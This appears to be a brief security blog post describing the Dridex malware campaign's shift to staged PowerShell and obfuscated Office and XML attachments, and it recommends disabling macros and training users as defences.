#Dridex - A closer look at the numbers

Ive been monitoring this campaign for a while, and of course there are enough educational posts on it available. 

None of these blogs offer much in the way of intelligence around what the malware does, they are very technical and for that reason serve a higher purpose.

I respond better to visual information rather than a wall of text, over a period of 6 weeks i saw a number of complex campaigns, Dridex is evolving utilising PowerShell in stages, having previously used batch scripting to execute. 

Delivering Word documents, or Excel and even this week simple xml, not encrypted as such, but obfuscated with various methods.

Mitigation is easy, disable macros. Educate your users - they are the biggest threat, and also the biggest allies, they have the ability to educate you on the final stage, which in some respects is your blind spot - when a new attack vector is launched, the user is the beta tester for your company and for the threat actor.

Install some good QA in them, if nothing else.


Dridex Infograph

 

A short video of information being sent to a server with the /cashflow url